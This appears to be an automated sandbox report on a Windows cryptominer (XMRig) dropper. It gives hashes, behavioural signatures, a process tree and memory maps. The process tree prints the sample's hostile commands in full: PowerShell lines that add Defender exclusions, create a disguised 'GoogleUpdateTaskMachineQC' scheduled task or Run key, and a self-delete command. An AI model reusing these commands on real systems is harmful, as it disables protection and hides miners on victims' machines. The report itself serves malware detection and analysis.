Resubmissions

25-01-2024 16:55

240125-vfcyksbhgr 10

24-01-2024 17:15

240124-vstf4aecaj 10

23-01-2024 19:27

240123-x6cfvagbd9 10

23-01-2024 19:27

240123-x6bvbafgem 10

23-01-2024 19:27

240123-x6bjjsgbd8 10

23-01-2024 19:27

240123-x6ax1sfgek 10

23-01-2024 19:27

240123-x6abgsfgej 10

23-01-2024 19:27

240123-x591qagbd7 10

23-01-2024 19:27

240123-x59d7agbd6 10

23-01-2024 19:27

240123-x584esgbd5 10

Analysis

  • max time kernel
    1413s
  • max time network
    1802s
  • platform
    windows7_x64
  • resource
    win7-20231215-en
  • resource tags

    arch:x64arch:x86image:win7-20231215-enlocale:en-usos:windows7-x64system
  • submitted
    23-01-2024 19:27

General

  • Target

    grhsghsGHswgh/EtPLMpbCyFJpMJr7.exe

  • Size

    2.0MB

  • MD5

    a16a669a09bf158058b83e04e69fe38e

  • SHA1

    f6c94763850d9e590d86057139e8895a7aacdeea

  • SHA256

    cacc0261ccf7578ef5c1f9fdbe35705ad91070d020a4225e05cbf71a6103ac8e

  • SHA512

    658b52ad1d27becee5b5bbd443d43da38b88d49880e72c8cb843f176a2d84d571b39c34dbc7cfb7ea56acc548acc5b68cce47a8bcf9d173feec031f7e33a09c6

  • SSDEEP

    49152:rWVipAxqo5p88CbXuxWQiSJU320ZW21Q0YWAij64ane6szjmL/45:rxAEcp9ueXit9WAQ0YWuO

Score
10/10

Malware Config

Signatures

  • Suspicious use of NtCreateUserProcessOtherParentProcess 10 IoCs
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • XMRig Miner payload 29 IoCs
  • Deletes itself 1 IoCs
  • Executes dropped EXE 1 IoCs
  • Loads dropped DLL 1 IoCs
  • UPX packed file 30 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Drops file in System32 directory 5 IoCs
  • Suspicious use of SetThreadContext 2 IoCs
  • Drops file in Program Files directory 4 IoCs
  • Creates scheduled task(s) 1 TTPs 2 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Detects videocard installed 1 TTPs 1 IoCs

    Uses WMIC.exe to determine videocard installed.

  • Modifies data under HKEY_USERS 3 IoCs
  • Suspicious behavior: EnumeratesProcesses 25 IoCs
  • Suspicious behavior: LoadsDriver 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 31 IoCs
  • Suspicious use of WriteProcessMemory 20 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Windows\Explorer.EXE
    C:\Windows\Explorer.EXE
    1⤵
      PID:1200
      • C:\Users\Admin\AppData\Local\Temp\grhsghsGHswgh\EtPLMpbCyFJpMJr7.exe
        "C:\Users\Admin\AppData\Local\Temp\grhsghsGHswgh\EtPLMpbCyFJpMJr7.exe"
        2⤵
        • Suspicious use of NtCreateUserProcessOtherParentProcess
        • Drops file in Program Files directory
        • Suspicious behavior: EnumeratesProcesses
        PID:1924
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
        2⤵
        • Drops file in System32 directory
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2708
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#wokgfo#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }
        2⤵
        • Drops file in System32 directory
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:2832
        • C:\Windows\system32\schtasks.exe
          "C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn GoogleUpdateTaskMachineQC /tr "'C:\Program Files\Google\Chrome\updater.exe'"
          3⤵
          • Creates scheduled task(s)
          PID:2732
      • C:\Windows\System32\cmd.exe
        C:\Windows\System32\cmd.exe /c choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\grhsghsGHswgh\EtPLMpbCyFJpMJr7.exe"
        2⤵
        • Deletes itself
        • Suspicious use of WriteProcessMemory
        PID:2572
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#glbtb#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "GoogleUpdateTaskMachineQC" } Else { "C:\Program Files\Google\Chrome\updater.exe" }
        2⤵
        • Drops file in System32 directory
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:2184
        • C:\Windows\system32\schtasks.exe
          "C:\Windows\system32\schtasks.exe" /run /tn GoogleUpdateTaskMachineQC
          3⤵
            PID:1268
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
          2⤵
          • Drops file in System32 directory
          • Modifies data under HKEY_USERS
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1848
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#wokgfo#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }
          2⤵
          • Drops file in System32 directory
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:976
          • C:\Windows\system32\schtasks.exe
            "C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn GoogleUpdateTaskMachineQC /tr "'C:\Program Files\Google\Chrome\updater.exe'"
            3⤵
            • Creates scheduled task(s)
            PID:1692
        • C:\Windows\System32\cmd.exe
          C:\Windows\System32\cmd.exe /c wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"
          2⤵
          • Drops file in Program Files directory
          PID:1540
        • C:\Windows\System32\cmd.exe
          C:\Windows\System32\cmd.exe /c wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"
          2⤵
          • Drops file in Program Files directory
          • Suspicious use of WriteProcessMemory
          PID:2192
        • C:\Windows\System32\conhost.exe
          C:\Windows\System32\conhost.exe qtdiqnkejoz
          2⤵
          • Suspicious use of NtCreateUserProcessOtherParentProcess
          • Suspicious behavior: EnumeratesProcesses
          PID:1452
        • C:\Windows\System32\conhost.exe
          C:\Windows\System32\conhost.exe coygkprqxpklmnvz 6E3sjfZq2rJQaxvLPmXgsF7vH8nKLC0ur3jCwye3fPooFst8AJlNjZc1TvSyIQTKz3bkbADxizSwgp6IHJKg4enmph7iNmIeAYcJJRGkawcinVbrMdr45fHmW9ZqCrw3dSLKVMKzrI2u4sgGlTj0G1RmIYUpqYq+tIjGyNap0si+Bl1xh/1o3aGmtmdST7PlUgkYz6ci8qWCk/Icfx3DrSi2oQaBV3Dr68Ysn/4ifK09AI9K4Wz/J2kKABX44SMSz/klz2Q+FtxUOLuLpB0ApMJVvTxUIOnUHLATPgLq86uJLXtnMRoz90CklrR3X6ggj+Qodet1aWyPnFIog0clkH9Lt1wIn/XNs6NZ/3bJg2NyJ2xuvDRy+oOBgUebKWiz
          2⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:1300
      • C:\Windows\System32\choice.exe
        choice /C Y /N /D Y /T 3
        1⤵
          PID:2640
        • C:\Windows\system32\taskeng.exe
          taskeng.exe {556AB432-3C38-4843-BB12-9E6B350426C9} S-1-5-18:NT AUTHORITY\System:Service:
          1⤵
          • Loads dropped DLL
          • Suspicious use of WriteProcessMemory
          PID:1668
          • C:\Program Files\Google\Chrome\updater.exe
            "C:\Program Files\Google\Chrome\updater.exe"
            2⤵
            • Suspicious use of NtCreateUserProcessOtherParentProcess
            • Executes dropped EXE
            • Suspicious use of SetThreadContext
            • Drops file in Program Files directory
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:2868
        • C:\Windows\System32\Wbem\WMIC.exe
          wmic PATH Win32_VideoController GET Name, VideoProcessor
          1⤵
          • Detects videocard installed
          • Modifies data under HKEY_USERS
          • Suspicious use of AdjustPrivilegeToken
          PID:2304

        Network

        MITRE ATT&CK Enterprise v15

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • C:\Program Files\Google\Chrome\updater.exe
          Filesize

          1.4MB

          MD5

          e1bffe8092ae5d428efcb16451f0b2dc

          SHA1

          ff4828ee6a14c9e979fc2fd728dc9fde363368c5

          SHA256

          77e2090af0c019cdb32f100f4d2993b11f4ad86ad25f504b236b71d2301d7298

          SHA512

          f5d31f5528d4006a711188f8416b18c5826d4998f9a459966b6276d6546f3d1ebb4c1e06b86fe39bf182a5253ea7caa8fa44e5b2833b99310543d5314303522a

        • C:\Program Files\Google\Chrome\updater.exe
          Filesize

          1.3MB

          MD5

          acd00a5752809c71b1fffa760ddf557d

          SHA1

          b4dfff2405f3d668f36431110c646a4ddc42fdd1

          SHA256

          0f074bf5542d8573ae436e00d0a1fb8a2856796497261715f3a4516b1ba6dfb5

          SHA512

          0348bdb7bc478b99e042c1ad3ee553ebf916ea6eb1417af2b5f8c37501d2815e9ce8f6e7b9f12942b3649139e6af43c2a96fd3d76f8777013ebc608e2154213d

        • C:\Program Files\Google\Libs\g.log
          Filesize

          198B

          MD5

          37dd19b2be4fa7635ad6a2f3238c4af1

          SHA1

          e5b2c034636b434faee84e82e3bce3a3d3561943

          SHA256

          8066872eea036f3ff59d58ff82ea1d5a8248ebc3c2b6161a17fe5c48441edc07

          SHA512

          86e8550412f282e18ef0c6417ee94e9c141433913452efffb738d92f040e20ecc5e2250e9e2ac1f94c248eab83a601cba5b006e982a4aefe9dcb88e9c53c67e5

        • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
          Filesize

          7KB

          MD5

          abf4ea1bcffc4c42141e327ffb50fbb9

          SHA1

          ac8cbcff745c45e0a075a62f2c109550273ac8c4

          SHA256

          497890455abedf6ed9438308c38e0c2dbdf48add03a97d0ebcd2094191e18ea5

          SHA512

          461a9abfd6e8b03107c4c53ab29836438df455c2307be853002c77301116182bbfa61c88be967745297b8f0c45e8dcef26dd6a56e82e9932e2384b47db399560

        • \??\PIPE\srvsvc
          MD5

          d41d8cd98f00b204e9800998ecf8427e

          SHA1

          da39a3ee5e6b4b0d3255bfef95601890afd80709

          SHA256

          e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

          SHA512

          cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

        • \Program Files\Google\Chrome\updater.exe
          Filesize

          1.1MB

          MD5

          adecdaab70a27885623e9b0403f1dca7

          SHA1

          5ada1d986151fce45d33eb9b9a8d79718cbfa615

          SHA256

          7754808c56c1731d290fc1fb377bca79662376619ecaf614becc1ad09643e139

          SHA512

          44b2429a7d9ae7317ccc508b5c69dbef49cdfa75b31dcedcad2129b94d332748cf1ed422dff334a72b3d15f04375245d3e634369d1a2046e696585bf1ee3b5f2

        • memory/976-57-0x0000000000910000-0x0000000000990000-memory.dmp
          Filesize

          512KB

        • memory/976-56-0x000007FEF5410000-0x000007FEF5DAD000-memory.dmp
          Filesize

          9.6MB

        • memory/976-55-0x0000000000910000-0x0000000000990000-memory.dmp
          Filesize

          512KB

        • memory/976-54-0x000007FEF5410000-0x000007FEF5DAD000-memory.dmp
          Filesize

          9.6MB

        • memory/976-59-0x0000000000910000-0x0000000000990000-memory.dmp
          Filesize

          512KB

        • memory/976-58-0x0000000000910000-0x0000000000990000-memory.dmp
          Filesize

          512KB

        • memory/976-60-0x000007FEF5410000-0x000007FEF5DAD000-memory.dmp
          Filesize

          9.6MB

        • memory/1300-87-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/1300-97-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/1300-136-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/1300-134-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/1300-132-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/1300-130-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/1300-128-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/1300-126-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/1300-124-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/1300-122-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/1300-120-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/1300-118-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/1300-116-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/1300-114-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/1300-112-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/1300-105-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/1300-103-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/1300-101-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/1300-99-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/1300-95-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/1300-93-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/1300-91-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/1300-89-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/1300-85-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/1300-83-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/1300-81-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/1300-79-0x0000000000530000-0x0000000000550000-memory.dmp
          Filesize

          128KB

        • memory/1300-78-0x0000000000270000-0x0000000000290000-memory.dmp
          Filesize

          128KB

        • memory/1300-77-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/1300-75-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/1300-73-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/1300-71-0x0000000000530000-0x0000000000550000-memory.dmp
          Filesize

          128KB

        • memory/1300-70-0x0000000000270000-0x0000000000290000-memory.dmp
          Filesize

          128KB

        • memory/1300-68-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/1300-69-0x00000000000B0000-0x00000000000D0000-memory.dmp
          Filesize

          128KB

        • memory/1452-72-0x0000000140000000-0x0000000140016000-memory.dmp
          Filesize

          88KB

        • memory/1452-76-0x0000000140000000-0x0000000140016000-memory.dmp
          Filesize

          88KB

        • memory/1848-52-0x000007FEF4A70000-0x000007FEF540D000-memory.dmp
          Filesize

          9.6MB

        • memory/1848-46-0x000007FEF4A70000-0x000007FEF540D000-memory.dmp
          Filesize

          9.6MB

        • memory/1848-47-0x0000000001180000-0x0000000001200000-memory.dmp
          Filesize

          512KB

        • memory/1848-49-0x0000000001180000-0x0000000001200000-memory.dmp
          Filesize

          512KB

        • memory/1848-48-0x000007FEF4A70000-0x000007FEF540D000-memory.dmp
          Filesize

          9.6MB

        • memory/1848-51-0x0000000001180000-0x0000000001200000-memory.dmp
          Filesize

          512KB

        • memory/1848-50-0x0000000001180000-0x0000000001200000-memory.dmp
          Filesize

          512KB

        • memory/1924-29-0x000000013FA60000-0x000000013FC71000-memory.dmp
          Filesize

          2.1MB

        • memory/1924-0-0x000000013FA60000-0x000000013FC71000-memory.dmp
          Filesize

          2.1MB

        • memory/2184-39-0x00000000027C0000-0x0000000002840000-memory.dmp
          Filesize

          512KB

        • memory/2184-38-0x00000000027C0000-0x0000000002840000-memory.dmp
          Filesize

          512KB

        • memory/2184-35-0x000007FEF5410000-0x000007FEF5DAD000-memory.dmp
          Filesize

          9.6MB

        • memory/2184-36-0x00000000027C0000-0x0000000002840000-memory.dmp
          Filesize

          512KB

        • memory/2184-37-0x000007FEF5410000-0x000007FEF5DAD000-memory.dmp
          Filesize

          9.6MB

        • memory/2184-40-0x00000000027CB000-0x0000000002832000-memory.dmp
          Filesize

          412KB

        • memory/2184-41-0x000007FEF5410000-0x000007FEF5DAD000-memory.dmp
          Filesize

          9.6MB

        • memory/2708-8-0x0000000002710000-0x0000000002790000-memory.dmp
          Filesize

          512KB

        • memory/2708-10-0x0000000002710000-0x0000000002790000-memory.dmp
          Filesize

          512KB

        • memory/2708-5-0x000000001B250000-0x000000001B532000-memory.dmp
          Filesize

          2.9MB

        • memory/2708-6-0x0000000002390000-0x0000000002398000-memory.dmp
          Filesize

          32KB

        • memory/2708-13-0x000007FEF5410000-0x000007FEF5DAD000-memory.dmp
          Filesize

          9.6MB

        • memory/2708-7-0x000007FEF5410000-0x000007FEF5DAD000-memory.dmp
          Filesize

          9.6MB

        • memory/2708-12-0x0000000002710000-0x0000000002790000-memory.dmp
          Filesize

          512KB

        • memory/2708-11-0x000007FEF5410000-0x000007FEF5DAD000-memory.dmp
          Filesize

          9.6MB

        • memory/2708-9-0x0000000002710000-0x0000000002790000-memory.dmp
          Filesize

          512KB

        • memory/2832-21-0x000007FEF4A70000-0x000007FEF540D000-memory.dmp
          Filesize

          9.6MB

        • memory/2832-19-0x000000001B130000-0x000000001B412000-memory.dmp
          Filesize

          2.9MB

        • memory/2832-22-0x0000000002510000-0x0000000002590000-memory.dmp
          Filesize

          512KB

        • memory/2832-20-0x0000000002450000-0x0000000002458000-memory.dmp
          Filesize

          32KB

        • memory/2832-27-0x000007FEF4A70000-0x000007FEF540D000-memory.dmp
          Filesize

          9.6MB

        • memory/2832-26-0x0000000002510000-0x0000000002590000-memory.dmp
          Filesize

          512KB

        • memory/2832-23-0x000007FEF4A70000-0x000007FEF540D000-memory.dmp
          Filesize

          9.6MB

        • memory/2832-24-0x0000000002510000-0x0000000002590000-memory.dmp
          Filesize

          512KB

        • memory/2832-25-0x0000000002510000-0x0000000002590000-memory.dmp
          Filesize

          512KB

        • memory/2868-67-0x000000013F220000-0x000000013F431000-memory.dmp
          Filesize

          2.1MB

        • memory/2868-45-0x000000013F220000-0x000000013F431000-memory.dmp
          Filesize

          2.1MB